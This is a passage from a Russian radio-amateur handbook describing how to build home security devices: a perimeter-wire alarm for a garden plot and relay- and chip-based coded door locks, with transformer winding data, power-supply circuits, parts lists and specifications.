Неоновая лампочка HI тлеющего разряда сигнализирует о подаче переменного напряжения на сетевой трансформатор после включения питания переключателем S1. Гасящее сопротивление резистора R1 обеспечивает равномерное свечение лампы H1 и предохраняет от бросков напряжения.

В сторожевом устройстве применен сетевой унифицированный трансформатор питания Т1 серии ТН. Трансформатор имеет пять обмоток: две первичные и три вторичные. Первичные обмотки рассчитаны на подключение к сети переменного тока напряжением 110, 127, 220 и 237 В частотой 50 Гц. На рис. 2. 14 показано включение первичных обмоток на напряжение 220 В. Для включения трансформатора в сеть переменного напряжения 127 В необходимо соединить выводы 1 и 4, 3 и 6, а напряжение подать на выводы 1 и 3 или 4 и 6.

Сетевой трансформатор питания необходим не только для трансформации напряжения до низких значений, но и для полной гальванической развязки первичной сети высокого напряжения переменного тока от вторичных цепей БЭ,а это значительно повышает электробезопасность эксплуатации и позволяет производить наладочные работы при включенном в сеть устройистве. Конечно, при этом должны строго соблюдаться все меры предосторожности и выполняться все правила безопасности. Вместо покупного трансформатора в сторожевом устройстве можно применить самодельный трансформатор, собранный в домашней мастерской. Такой трансформатор изготавливается на броневом или стержневом магнитопроводе типа Ш или ШЛ и реже ПЛ.

Самодельный трансформатор питания можно выполнить по данным, приведенным в табл. 2.16. При этом можно изготовить простой двухобмоточный трансформа тор с одной первичной и одной вторичной обмотками Первичная обмотка рассчитана на подключение к сети переменного тока напряжением 220 В, а на вторичной обмотке в этом случае действует переменное напряжение 15 В при холостом ходе.

Таблица 2.16. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном стороже для приусадебного участка

2-131.jpg

Примечание: вместо самодельного трансформатора могут быть использованы унифицированные трансформаторы типов ТН4-127/220-50,ТНЗ 1-127/220-50, ТН34-127/220-50. ТПП-127/220-50, ТПП224-127/220-50.

Особое внимание при изготовлении самодельного трансформатора необходимо обратить на повышение со противления изоляции не только обмоточных проводов, но и на сопротивление изоляции между витками, обмотками и рядами. Как правило, при изготовлении трансформаторов используется рядовая укладка проводов, и крайне редко — универсальная, поэтому необходимо изолировать друг от друга каждый ряд обмоточного провода. Хорошие результаты можно получить при пропитке катушки трансформатора изоляционными лаками.

Между обмотками трансформатора укладывается один ряд обмоточного провода, один конец которого заземляется на магнитопровод. При укладке этого ряда, являющегося экраном, необходимо усилить изоляцию между обмотками.

На выводах унифицированного трансформатора в режиме номинальной нагрузки действует переменное напряжение: 6,3 В (выводы 7 и 8, обмотка II), 5/6,3 В (выводы 9, 10 и 11, обмотка ///), 6,3 В (выводы 12, 13 и 14, обмотка IV). Для получения на выходе трансформатора переменного напряжения 16,3В выводы обмоток соединены между собой последовательно, с соблюдением правила намотки. Начала намотки на схеме обозначены точками.

На выходе трансформаторных обмоток собрано выпрямительное устройство, выполненное на четырех диодах и двух оксидных конденсаторах. Выпрямитель выполнен по однофазной двухполупериодной мостовой схеме на диодах VD1—VD4 и имеет как положительные, так и негативные свойства. К положительным относятся: повышенная частота пульсации выпрямленного напряжения постоянного тока, пониженные значения обратного напряжения на выпрямительных диодах, хорошее использование габаритной мощности сетевого трансформатора питания Т1. К негативным: более высокие потери, пониженный кпд, невозможность установки диодов на металлическом радиаторе охлаждения без изоляционных прокладок, повышенная стоимость изготовления и повышенный расход выпрямительных диодов.

Работает выпрямитель на емкостную нагрузку, составленную из электролитических конденсаторов большой емкости С1 и С2.

Выпрямленное напряжение постоянного тока подается на стабилизатор напряжения, собранный на транзисторах VT1, VT2 и стабилитроне VD5. Стабилизированное напряжение 12 В устанавливается подстроечным резистором R5. Стабилизатор напряжения состоит из РЭ па транзисторе VT1, УПТ на транзисторе VT2, источника опорного напряжения на стабилитроне VD5, резисторов R2—R6, обеспечивающих режимы работы транзисторов, и выходного электролитического конденсатора С4. Следует заметить, что УПТ в стабилизаторе может питаться от дополнительного источника (например, ПСН).

Стабилизированное напряжение питания подается на БЭ сторожевого устройства в точках А и Б. В этих точках действует напряжение постоянного тока 12В. Если домашний мастер захочет сдублировать электропитание или подключить резервный источник в виде ХИТ, то конструктивно точки А и Б необходимо выполнить как приборные разъемные соединения.

Универсальное напряжение постоянного тока 12В позволяет питать сторожевое устройство от бортовой сети автомобиля, и применение его в этом случае может стать надежным дублирующим устройством для охраны любого транспортного средства. Вместо светового индикатора можно легко приспособить любой другой ИМ, срабатывающий при напряжении 12В и потребляющий ток нагрузки до 1 А.

Электронный блок сторожевого устройства представляет собой триггер Шмитта, вход которого соединен со шлейфом с помощью электрических соединителей Х2 и ХЗ. В соответствии с классификацией электронных устройств триггер является переключающим устройством, которое может любое время сохранять одно из двух своих состояний устойчивого равновесия и скачкообразно переключается по электрическому сигналу из одного состояния в другое.

Электронный блок собран на четырех транзисторах, одном диоде, одном конденсаторе С5 и резисторах, обеспечивающих необходимые режимы работы этих транзисторов как в режиме ожидания, так и в режиме подачи тревожных сигналов. Шлейф, прокладываемый по периметру охраняемой территории, изготавливается из тонкого обмоточного провода с медной жилой диаметром до 0,15 мм. Можно применить провод марки ПЭЛ, ПЭВ-1, ПЭВ-2. Срабатывает устройство при обрыве провода шлейфа, при этом транзистор VT6 открывается.

В исходном состоянии транзисторы БЭ закрыты и сигнальная лампа Н2 не светится. После открывания транзистора VT6 импульс тока переключает триггер Шмитта в состояние, при котором открывается транзистор VT3 и лампа Н2 загорается.

При изготовлении стороженого устройства для приусадебного участка использованы следующие комплектующие покупные ЭРИ и ЭРЭ: транзисторы V'T1 типа П213Б, VT2 МП37Б, VT3 - П217А, VT4 МП37, VT5 - MП37, VT6 МП37;

выпрямительные диоды VD1—VD4 типа КД202Р, VD6 - Д220;

стабилитрон VD5 типа Д814А; конденсаторы С1 типа МБМ-11-750В-0,01 мкФ, С2 - МБМ-II-750В-0,01мкФ, C3 К50-6-25В-1000 мкФ, С4 К50-6-16В-1000 мкФ, С:5 К50-6-16В-68 мкФ; резисторы R1 типа МЛТ-0,5-200 кОм, R2 МЛТ-0,5-4 7 кОм, R3— МЛТ-0,5-360Ом, R4 — МЛТ-0,5-390 Ом, R5 СП4-2Ма-0,5Вт-1,5 кОм, R6 — МЛТ-0,5-120 Ом, R7 -МЛТ 05-510 Ом, R8 — МЛТ-0,5-200 Ом, R9 — МЛТ 1 2,2 кОм, R10 — МЛТ-0,5-7,5 кОм, R11 — МЛТ-0,5-910 Ом, R12 — МЛТ-0,5-120 Ом, R13 — МЛТ-0,5-15 кОм, R14 — МЛТ-0,5-6,8 кОм, R15 — МЛТ-0,5-6,8 кОм, R16 — МЛТ-1-13 кОм, R17 — МЛТ-1-10 кОм; индикаторные лампы H1 типа ТН-0,2-1, Н2 — МН-12В-0.5А; электрические соединители X1 типа «вилка» с электрическим кабелем длиной 1,5 м и с двойной изоляцией;

Х2, ХЗ типа КМЗ-1 приборные; переключатель однополюсный S1 типа П1Т-1-1; плавкий предохранитель F1 типа ПМ-1-1 А;

контакты приборные А и Б для подключения автономного источника питания.

При настройке, регулировке и ремонте сторожевого устройства можно применить другие комплектующие элементы, предварительно проверенные на соответствие требованиям ТУ. Вместо резисторов типа МЛТ можно применять резисторы типов ВС, ВСа, МТ, ОМЛТ, УЛИ, БП, С2-14, БЛП, БЛПа, С2-10 и другие, конденсаторы типа К50-6 можно заменить на конденсаторы типов К50-3, К50-12, К.50-16, К.50-20 и другие, выпрямительные диоды типа КД202Р — на диоды типов меньшей мощности, например КД226Г, КД205А, Д237В; стабилитрон типа Д814А — на Д814Б, Д815Г, КС156А. Транзисторы, указанные на схеме, могут быть заменены в соответствии с рекомендациями, которые приведены в первой главе справочника.

Основные электрические параметры и технические характеристики электронного сторожа для садово-огородного участка

Номинальное напряжение питающей сети неременного тока, В ....................... 220 или 127

Номинальная частота питающей сети неременного тока, Гц .......................... 50

Номинальное напряжение автономного источника

электропитания постоянного тока, В ......... 12

Стабилизированное напряжение постоянною тока на выходе БП и контрольных гочках А и Б, В, не более ................... . ..... 12

Коэффициент нелинейных искажений питающей

сети переменного тока, %, не более ....... 12

Коэффициент стабилизации, не менее . . ..... 150

Пределы изменения напряжения питающей сети

переменного тока, В ................. 187...242 или

110...140

Пределы изменения частоты питающей сети неременною тока, Гц ..................... 49,5...50,5

Пределы изменения напряжения автономною источника питания, при которых сохраняется работоспособность устройства без срывов, В .... 9...14

Напряжение на входе выпрямительного устройства

в режиме холостого хода, В ............... 16,3

Количество одновременно охраняемых объектов, шт . 1

Время срабатывания устройства при обрыве провода шлейфа, мс, не более ................ 10

Максимально потребляемый ток, А ........... 1

Номинальный ток нагрузки в режиме холостого хода, мА, не более ..................... 45

Переменная составляющая (пульсации) напряжения на выходе в точках А и Б, Вэфф, не более . . 0,14

Изменение напряжения на выходе стабилизатора при изменении напряжения сети от 187 до 242 В, В, не более .......................... 0,6

Срок службы, ч, не менее ................. 5000

Вероятность безотказной работы устройства при

риске заказчика в=0,95, не менее ......... 0,99

Сопротивление изоляции токоведущих проводников относительно корпуса БП, МОм, не менее ..... 20

Сопротивление проводника шлейфа, кОм, не более . 10

кпд, %, не менее ....................... 90

Условия эксплуатации:

температура окружающей среды, °С ....... —25...+45

относительная влажность воздуха при температуре 22 °С, %, не менее ............... 95

атмосферное давление воздуха, мм рт. ст. ..... 100...1000

as1.jpg

Рис. 2.16. Принципиальная схема электронного сторожа для садово-огородного участка.

 

Рис. 2.16. Принципиальная схема электронного сторожа для садово-огородного участка.

Изображение: 

Таблица 2.16. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном стороже для приусадебно

Изображение: 

2.14. Электронно-релейное сторожевое устройство с емкостой памятью

2. 14. ЭЛЕКТРОННО-РЕЛЕЙНОЕ СТОРОЖЕВОЕ УСТРОЙСТВО С ЕМКОСТНОЙ ПАМЯТЬЮ

Настоящее устройство относится к группе сторожевых устройств, основу которых составляют электромеханические или электронные контакты, управляющие электромагнитными ИМ и образующие единую сторожевую систему. В этих системах управляющее напряжение подается, как правило, лишь при условии замыкания определенных контактов и в строго определенной последовательности. Включение электромагнита в таких устройствах приводит к перемещению его сердечника и стопора, связанного с механическим замком, после чего можно открывать замок обычным ключом или автоматически. Рассматриваемое сторожевое устройство предназначено для охраны стационарных объектов и в первую очередь жилых и производственных помещений: квартир, офисов, хозяйственных построек, складов, гаражей и т. д.

Изменяя вид ИМ, можно значительно расширить применяемость данного устройства, при этом само устройство принципиально сохраняется в неизменном виде. Например, можно в качестве ИМ использовать устройства звуковой или световой сигнализации, можно применить дополнительные блокировки при ошибках, допущенных при наборе шифра. Но в данном случае рассматривается очень простой вариант срабатывания ИМ при наборе трех цифр кода.

Принципиальная электрическая схема электронно-релейного сторожевого устройства с емкостной памятью приведена на рис. 2. 17. Работает устройство от сети переменного тока напряжением 220 В частотой 50 Гц через понижающий трансформатор. Электропитание основной схемы и исполнительных механизмов осуществляется стабилизированным напряжением 24 В постоянного тока. Электропитание сторожевого устройства от автономного вторичного источника питания не предусмотрено.

При конструировании данного сторожевого устройства рекомендуется выполнить его в виде самостоятельных функциональных узлов, связь между которыми должна осуществляться с помощью электрического монтажа. Для обеспечения этого условия в конструкциях отдельных блоков необходимо предусмотреть необходимое количество быстроразъемных соединений и приборных контактов, которые имеют минимальное переходное сопротивление. Условно всё устройство можно выполнить в виде трех блоков — самостоятельных сборочных единиц: БП, БЭ, блока исполнительных механизмов.

Достаточно трудоемкой для изготовления частью электронного сторожевого устройства является БП, выполненный на ППП. Схемно-техническое решение БП является традиционным, не включает в себя сложных

элементов и поэтому вполне доступно для повторения начинающими радиолюбителями. Изготовленный в домашней мастерской данный БП значительно расширяет возможности радиолюбительской лаборатории, дает возможность приобрести дополнительный опыт конструирования РЭУ с системой защиты и использовать данный БП в практических целях, так как он имеет высокие технические характеристики и безопасен при эксплуатации. Защитное устройство в БП позволяет также избежать порчи остродефицитных и дорогостоящих ЭРИ и ЭРЭ при перегрузках и коротких замыканиях. БП включает в свой состав входные цепи, сетевой понижающий трансформатор питания Т1, выпрямитель, емкостный фильтр, стабилизатор напряжения постоянного тока, защитное устройство с ограничением выходного тока при перегрузке и с контролем уровня выходного напряжения. Отличительной особенностью примененного защитного устройства является то, что оно срабатывает как при повышении, так и при понижении напряжения на нагрузке.

Защитный узел БП может быть использован в других ЭРИ в составе различных типов стабилизаторов, так как он проверен при эксплуатации и всегда дает положительный результат.

Блок питания выполнен на шести транзисторах VT1— VT6. Подключение БП к сети переменного тока осуществляется с помощью электрического соединителя X1 типа «вилка». Два плавких предохранителя F1 и F2 рассчитаны на ток срабатывания 0,5 А при полной нагрузке, защищают входные цепи и устройство от коротких замыканий при ошибках в монтаже. Установленные на входе БП два конденсатора С1 и С2 параллельно первичной обмотке трансформатора Т1 защищают устройство от низкочастотных помех, проникающих в сеть питания переменного тока. Включение и выключение электропитания обеспечивается однополюсным переключателем S1.

В БП использован самодельный сетевой понижающий трансформатор питания Т1, изготовленный на броневом магнитопроводе типа Ш или ШЛ. Активная площадь поперечного сечения стали основного стержня магнитопровода должна быть не менее 6,5 см^2. Выполнение этого условия обеспечивается шихтованным магнитопроводом типоразмера Ш25Х25. Можно применить магнитопровод ШЛ25Х32, ШЛМ25Х25, УШ20Х30. Сетевой трансформатор обеспечивает на выходе 33 В переменного напряжения в режиме холостого хода, заданное выпрямленное напряжение постоянного тока, а также полную гальваническую развязку между первичной и вторичными цепями устройства. Для намотки первичной обмотки трансформатора применен провод марки ПЭВ-1 диаметром 0,31 мм и провод марки ПЭВ-2 диаметром 0,76 мм для вторичной обмотки. Первичная обмотка содержит 1210 витков, вторичная — 182 витка.

При изготовлении сетевого трансформатора необходимо точно соблюдать технологические приемы для того, чтобы обеспечить заданные электрические параметры. Основные рекомендации по изготовлению и изоляции трансформаторов рассмотрены выше.

Сетевой понижающий трансформатор питания должен обеспечивать следующие электрические параметры и технические характеристики на протяжении всего периода эксплуатации:

Рабочий диапазон частот, Гц ................ 30...200

Номинальная мощность, Вт ................. 50

Резонансная частота, Гц, нс менее ............ 1000

Максимальное значение испытательного напряжения, В ............................ 500

Коэффициент нелинейных искажений на граничных частотах рабочего диапазона, %, не более . . 5

Коэффициент амплитудно-частотных искажении в

рабочем диапазоне частот, дБ ............. ±2

Максимальная амплитуда переменного входного

напряжения, В ........................ 280

Предельное отклонение сопротивления постоянному току, %, не более .................. ± 15

Максимальное напряжение на первичной обмотке

трансформатора, В ..................... 440

Сопротивление нагрузки трансформатора, кОм .... 0,01...20

Максимальное постоянное напряжение на обмотках трансформатора по отношению к шасси сторожевого устройства, В ................ 300

Коэффициент трансформации ................ 6,65

Сопротивление изоляции между обмотками, а также между каждой обмоткой и магнитопроводом, МОм, не менее ................ 20

Максимальное отклонение коэффициента трансформации, %, не более .................. ±5

Номинальное выходное напряжение переменного

тока на вторичной обмотке, В .............. 33

Выпрямитель сторожевого устройства собран по традиционной однофазной двухполупериодной мостовой схеме на четырех диодах VD1-VD4 средней мощности. Выпрямитель работает на емкостную нагрузку на оксидном конденсаторе С3. На выходе выпрямителя под нагрузкой действует постоянное напряжение 25 В, которое подается наi стабилизатор напряжения, собранный на транзисторах VT2—VT4.

Стабилизатор напряжения компенсационного типа обеспечивает необходимую стабильность. напряжения на нагрузке при помощи отрицательной обратной связи, воздействующей на РЭ. В состав компенсационного стабилизатора последовательного типа входят следующие основные функциональные узлы: РЭ, устройство сравнения и УПТ. Регулирующий элемент выполнен на составном транзисторе VT2, VT3. Схема стабилизатора собрана по классическому варианту, и в данном случае оригинальным решением является защитное устройство.

Защитное устройство, собранное на транзисторах VT1, VT5, VT6, работает следующим образом. При уменьшении выходного напряжения до 21 В или при увеличении выходного напряжения до 27 В при номинальном напряжении 24 В защитное устройство срабатывает, обесточивая стабилизатор напряжения. Основным ИМ защитного устройства является электромагнитное реле К1. При перегрузке или коротком замыкании, когда стабилизатор входит в аварийный режим, напряжение на нагрузке резко уменьшается и при его суммарном значении на стабилитронах VD10 и VD11 становится ниже действующего на них, транзистор VT5 закрывается. Начинает заряжаться конденсатор С5, и при определенном значении напряжения открывается транзистор VT1, срабатывает электромагнитное реле К1 и самоблокируется контактами К1.1. В это же время параллельно включенные контакты реле К1.2 и К1.3 размыкаются, обесточивая стабилизатор напряжения.

При повышении напряжения на нагрузке, которое вызовет также аварийный режим работы и будет выше напряжения стабилизации цепи стабилитронов VD12, VD13, откроется транзистор VT6, что в свою очередь приведет к закрыванию транзистора VT5 и отключению стабилизатора от выпрямителя так же, как и при понижении напряжения на нагрузке.

Конденсатор С1 играет роль буфера, который при первом включении еще не зарядился, тем самым он обеспечивает необходимую задержку включения. Этот конденсатор выполняет еще одну функцию — помехозащитною фильтра. Но основное время задержки срабатывания зависит от параметров электромагнитного реле К1. Максимальное время задержки составляет ориентировочно 20 мс.

Основными элементами сторожевого устройства и БЭ являются конденсаторы С8, С9 и С10, емкость которых рассчитана на определенное напряжение срабатывания электромагнитного реле КЗ, транзистор V'T7, выпрямительные диоды VD15-VD18, электромагнит ЭМ1 и детали коммутационные.

Шифровальный узел устройства включает в себя набор электрических соединителей Х2—Х25, перемычки, устанавливаемые между этими соединителями, и переключатели S2—S7. Конструктивно шифровальный узел рекомендуется расположить на лицевой плате БЭ. В данном случае удобно рассмотреть работу устройства при кодировании трехзначного числа.

Всегда первая цифра кода соответствует номеру кнопки первого переключателя S2, подключенной к гнездам Х2 и Х4, вторая цифра — номеру кнопки, подключенной к гнездам соединителей Х6 и Х8, третья — номеру кнопки, подключенной к гнездам соединителей Х10 и Х12. Для того чтобы сработало устройство охраны, кнопки должны быть нажаты в порядке установленного шифра. Кнопки переключателей S5—S7 являются некодовыми, и в случае нажатия любой из них устройство не сработает. В данном случае установлен шифр 123.

Для установления другого шифра необходимо сделать перетрассировку перемычек, соединяющих их. Например, если потребуется установить шифр 624, необходимо Х22 соединить с ХЗ, Х24 с Х5; Х6 с Х7, Х8 с Х9;

Х14 с X11, Х16 с Х13. Остальные пары соединителей можно устанавливать в любом порядке. Например, Х2 с Х15, Х4 с Х17, Х10 с Х19, Х12 с Х21; Х18 с Х23, Х20 с Х25.

Таким образом, цифры, указанные над переключателями S2—S7, являются цифрами будущего шифра, а цифры, стоящие в кавычках (также с 1 до б), указывают на порядок счета при нажатии кнопок. Любая верхняя на схеме цифра кода — с 1 до 6 — имеет только ей принадлежащую пару контактных соединителей. Поэтому при изготовлении кодировочного узла очень удобно объединять эти пары и включать одновременно в гнезда, устанавливающие порядок счета. Так, цифре кода, обозначенной 1, соответствуют контакты соединителей Х2 и Х4, цифре 2 — контакты Х6 и Х8 и т. д. Соединять пары контактов Х2 и Х4, Х6 и Х8 и т. д. можно с любыми парами контактов дешифратора. Заметим еще раз, что контакты соединителей ХЗ и Х5 обозначены цифрой 1, контакты Х7 и Х9 — цифрой 2, X11 и Х13 — цифрой 3, Х15 и Х17 — цифрой 4, Х19 и Х21 — цифрой 5 и Х23 и Х25 — цифрой 6. Цифры дают только порядок считывания зашифрованного кода, который не изменяется в данной схеме.

При нажатии первой кнопки S2 конденсатор С8 начинает заряжаться напряжением, которое снимается с резистора R13 (по расчету — до 85% его номинального значения). Срабатывает первая цифра кода. При нажатии на вторую кнопку переключателя S3 до такого же напряжения начинает заряжаться конденсатор С9; при нажатии третьей кнопки S4 конденсатор С10 заряжается до полного напряжения, действующего на резисторе R13. Таким образом, суммарное напряжение на конденсаторах С8—С10 после набора правильного шифра 123 будет составлять только 27% напряжения, снимаемого с резистора R13 и достаточного для срабатывания электромагнитного реле КЗ. При правильном нажатии лишь двух кнопок шифра напряжение на конденсаторах С8— С10 окажется недостаточным для срабатывания этого реле. В случае нажатия любой другой кнопки переключателей S5—S7 конденсаторы тут же разрядятся через диоды VD15—VD18 и сторожевое устройство вернется в исходное состояние.

После правильного набора шифра необходимо нажать кнопку переключателя S8. При этом на базу транзистора VT7 будет подано напряжение отрицательной полярности, транзистор VT7 откроется и сработает электромагнитное реле КЗ. Контакты этого реле КЗ.3 включат электромагнит, который своим сердечником связан с механическим замком, и он откроется. Одновременно контакты КЗ.2 подключат резистор R12 к базе транзистора, а через контакты реле КЗ.1, резистор R13 и диоды VD15—VD17 конденсаторы С8—С10 разрядятся. При отпускании кнопки переключателя S8 база транзистора VT7 вновь соединится с плюсом источника питания, транзистор закроется и устройство возвратится в исходное состояние. При изготовлении сторожевого устройства использованы следующие покупные и самодельные комплектующие ЭРИ и ЭРЭ: транзисторы VT1 типа КТ203А, VT2 — КТ803А, VT3 — КТ81В, VT4 — КТ814В, VT5 — КТ203Б, VT6 — КТ203Б, VT7 — П214; конденсаторы С1 типа МБМ-11-750В-0,01 мкФ, С2-МБМ-11-750В-0.01 мкФ, СЗ — К50-6-50В 50 мкФ, С4 — K50-6-50В-4000мкФ, С5-К73-17-63В-1мкФ С6-К-10-17-50В-П33-100нФ, С7 — К53-1А-30В-б,8 мкФ, С8-К50-3-15В-10 мкФ, С9 — K50-3-15B-68 мкФ, С10 - К50-3-15В-400 мкФ;

резисторы R1-типа ВСа-0,5-330Ом, R2-ВСа-0,25-110 Ом R3-ВСа-0,25-680 Ом, R4 — ВСа-0,5-10 кОм, R5 - ВСа-0,5-2,7 кОм, R6 — ВСа-0,25-15 кОм, R7 — ВСа-0,25-10 кОм, R8 — ВСа-0,25-2,7 кОм, R9 — ВСа-0,25-2,7 кОм, R10 — ВСа-0,25-10 кОм, R11 — ВСа-0,25-2,7 кОм, R12 — ВСа-2-390 Ом, R13 — ВСа-0,5 160 Ом; выпрямительные диоды VD1—VD4 типа Д242Б, VD5 — КД522Б, VD15 — Д220, VD 16 — Д220, VD17 - Д220, VD18 — Д220; стабилитроны VD6 типа Д818А, VD7 - Д818А, VD8 — Д818А, VD9 — Д818А, VD10 — Д814Г VD11 — Д814Г, VD12 — Д814Д, VDI3 — Д814Д, VD14 — Д818А; электрические соединители X1 типа «вилка» с электрическим кабелем длиной 1,5 м, Х2—Х25 типа КМЗ-1 или сдвоенные контактные пары соединителей; плавкие предохранители F1 и F2 типа ПМ-1-1,5 А; переключатели S1 типа П1Т-1-1, S2-S7 - КМ1-1, S8 - КМ1-1; электромагнитные реле К1 типа РЭС-22 (паспорт РФ4.500.122), К2 — РЭС-6 или электромагнит самодельной конструкции, КЗ — РЭС-22 (паспорт РФ4.500.163); сетевой понижающий трансформатор питания Т1 броневой конструкции типа Ш (УШ, ШЛ).

При изготовлении, регулировке и ремонте сторожевого устройства могут быть использованы другие комплектующие ЭРЭ. Например, вместо резисторов типа ВСа можно применить резисторы типов МЛТ, ОМЛТ, МТ, С 1-4, С2-8 и другие, можно применить оксидные конденсаторы типов К50-6, К50-12, К50-16, К50-20. Вместо реле типа РЭС-22 можно применить реле типа РЭС-6 (паспорт РФО.452.131), вместо транзистора типа КТ803 — КТ819Б, КТ819В, КТ819Г, КТ827А, КТ827Б, транзистор типа КТ815В можно заменить на транзисторы типов КТ815Б, КТ801Б, КТ817Б, а КТ814В — на КТ814Г.

Настройка БП обеспечивается подборкой цепи стабилитронов VD10, VD11 так, чтобы их суммарное напряжение стабилизации было равно 21 В, а цепи VD12, VDI3 — 26,5...27 В. Налаживание БЭ сводится к правильному выбору сопротивления резистора R13, падение напряжения на котором должно обеспечить достаточный заряд конденсаторов С8, С9 и С10.

Основные электрические параметры и технические характеристики электронно-релейного сторожевого устройства с емкостной памятью

Номинальное напряжение читающей сети переменного тока, В....................... 220

Номинальное напряжение стабилизированною

постоянного тока, В................... 24

Номинальная частота питающей сети переменного тока, Гц ......................... 50

Коэффициент нелинейных искажений питающей

сети переменного тока, %, нс более ......... 12

Пределы изменения напряжения питающей сети

переменного тока, В .................... 180...240

Пределы изменения частоты питающей сети неременного тока, % ..................... ±1

Коэффициент стабилизации выпрямленного напряжения постоянного тока, нс менее ........ 300

Суммарное напряжение стабилизации на стабилитронах, В:

VD10—VD11 ......................... 21

VD12—VD13 ......................... 26.5...27

Амплитуда пульсации выходного напряжения при токе нагрузки до 1,5 А, мВ, не более ......... 2

Максимальный ток нагрузки на выходе стабилизатора напряжения, А ................... 4,5

Напряжение срабатывания защитного устройства,

В (нижнее и верхнее значения) ............. 21 и 27

Напряжение питания реле, В ............... 24

Количество одновременно охраняемых объектов ... 1 Время срабатывания сторожевого устройства при правильном наборе шифра, мс, не более ...... 2

Срок службы, ч, не менее .................. 5000

Вероятность безотказной работы устройства при

риске в=0,95, не менее .................. 0,97

Сопротивление изоляции токоведущих проводников монтажа между собой и металлических частей сторожевого устройства, МОм, не менее ....... 20

Помехозащищенность устройства при воздействии

внешнего электромагнитного поля, дБ, не менее . 120 кпд, %, не менее ........................ 80

Условия эксплуатации:

температура окружающей среды, С ......... —25...+45

относительная влажность воздуха при температуре 25 °С, %, не более ............... 92±3

атмосферное давление воздуха, мм рт. ст. ..... 200...900

sd11.jpg

Рис. 2.17. Принципиальная схема электронно-релейного сторожевого устройства с емкостной памятью.

Рис. 2.17. Принципиальная схема электронно-релейного сторожевого устройства с емкостной памятью.

Изображение: 

2.15. Малогабаритное охранное устройство с дискретным управлением

2.15. МАЛОГАБАРИТНОЕ ОХРАННОЕ УСТРОЙСТВО

С ДИСКРЕТНЫМ УПРАВЛЕНИЕМ

Данное электронное охранное устройство, собранное на ППП и микросхемах, предназначено для установки на входных дверях жилых и производственных помещений и может эксплуатироваться в условиях УХЛ, ХЛ и В. Работает охранное устройство от сети переменного тока напряжением 220 В частотой 50 Гц. При этом электропитание ИМС осуществляется стандартным номинальным напряжением 5 В.

Рассматриваемое охранное устройство может быть использовано также для блокировки открывания обычных врезных и накладных механических замков, устанавливаемых па наружных и внутренних дверях охраняемых объектов бытового и хозяйственною назначения, например на садово-огородных участках. При этом может быть обеспечена дополнительная защита открывания дверей, так как даже при наличии необходимого ключа замок невозможно открыть без знания пятизначного кода. Это достигается незначительной конструктивной доработкой, например врезного механического замка, заключающейся в установке дополнительного стопорного устройства, работающего от маломощного тягового электромагнита или от заменяющего его электромагнитного реле. Эта работа вполне доступна начинающему радиолюбителю в своей лаборатории.

Охранное устройство может быть рекомендовано также для установки на воротах гаражей и складских помещений при эксплуатации в условиях повышенной влажности (до 98%) и при температуре окружающей среды от —35 до 45 °С.

Устройство, принципиальная схема которого изображена на рис. 2.18, характеризуется высокими электрическими параметрами и техническими характеристиками, повышенной надежностью, долговечностью и устойчивостью к внешним механическим нагрузкам, в том числе вибрациям, потребляет малую мощность при работе и имеет сравнительно небольшие размеры. Это обеспечивается достаточно простым схемно-техническим решением и удобным конструктивным исполнением. Технология изготовления устройства определяется возможностями радиолюбителя, оснащением его домашней мастерской.

Комплектующие ЭРИ, входящие в схему охранного устройства, являются неотъемлемой частью системы, в которую дополнительно входят механический замок врезной или накладной конструкции, стопорное устройство защелки, ИМ, который приводится в действие от электромагнита или соленоида. Как следует из схемы, охранное устройство включает в свой состав входные цепи, конденсаторный фильтр, сетевой понижающий трансформатор питания Т1, выпрямитель, работающий на емкостный фильтр стабилизатор напряжения, кодозадающее устройство с дешифратором, ИМ.

Входные цепи обеспечивают подключение охранного устройства к сети переменного тока и защиту его электронной части от проникающих в сеть питания электромагнитных помех. Фильтр собран на двух конденсаторах С1 и С2 со средней точкой, замкнутой на землю. Плавкие предохранители F1 и F2 защищают устройство и его элементы от коротких замыканий и перегрузок, они рассчитаны на максимальный ток срабатывания 2 А. Подключается охранное устройство к питающей сети с помощью стандартного электрического соединителя типа «вилка» X1. После замыкания контактов двухпозиционного переключателя S1 напряжение начинает поступать на первичную обмотку трансформатора и одновременно загорается неоновая индикаторная лампа Н2. Напряжение на исполнительный электромагнит (ЭМ1) не поступает, так как тринистор VS1 находится в закрытом состоянии.

В составе БП устройства использован унифицированный сетевой понижающий трансформатор питания Т1 броневой конструкций типа ТПП. При отсутствии покупного трансформатора радиолюбитель сможет изготовить самодельный трансформатор по данным, приведенным в табл. 2.17. Изготавливается трансформатор на броневом магнитопроводе типа Ш, УШ или ШЛ (ШЛМ), активная площадь поперечного сечения стали которого должна быть не менее 6 см2.

Броневые трансформаторы характеризуются следующими достоинствами: наличием только одной катушки с обмотками по сравнению со стержневыми трансформаторами, более высоким заполнением окна магнитопровода обмоточным проводом, частичной защитой от механических повреждений катушки с обмотками ярмом магнитопровода. Пластинчатые магнитопроводы типа Ш или УШ собираются из отдельных пластин встык или внахлест. При сборке встык все пластины составляются вместе и располагаются одинаково; в этом случае магнитопровод состоит из двух частей, которые соединяют вместе. При сборке встык облегчаются сборка и разборка трансформатора.

Таблица 2. 17. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в малогабаритном охранном устройстве с дискретным управлением

2-151.jpg

При сборке внахлест пластины чередуются так, чтобы у соседних пластин разрезы были с разных сторон сердечника. Сборка внахлест уменьшает магнитное сопротивление магнитопровода, но усложняет сборку и разборку трансформатора. Начинающим радиолюбителям рекомендуется изготавливать магнитопровод методом шихтования из пластин электротехнической стали, если нет готового витого ленточного магнитопровода.

Самодельный трансформатор содержит три обмотки:

одну первичную, рассчитанную на напряжение 220 В переменного тока, и две вторичные обмотки, необходимые для получения заданного уровня выпрямленного напряжения постоянного тока. На вторичных обмотках сетевого трансформатора действует переменное напряжение 4...5 В при холостом ходе.

Сетевой трансформатор обеспечивает полную гальваническую развязку вторичных цепей электронной схемы устройства от сети переменного тока и надежную защиту и электробезопасность при наладке и регулировке. Рекомендации по технологическим операциям изготовления трансформатора в домашней мастерской рассмотрены выше, в них особое внимание обращается на сопротивление изоляции.

На выводах вторичных обмоток сетевого трансформа тора собран выпрямитель, на выходе которого действуем напряжение постоянного тока 5 В. Выпрямитель работает на емкостный фильтр, выполненный на оксидных конденсаторах. В данном устройстве для преобразования напряжения применена однофазная двухполупериодная мостовая схема, она имеет как положительные, так и отрицательные характеристики, которые ранее отмечались при рассмотрении подобных охранных устройств.

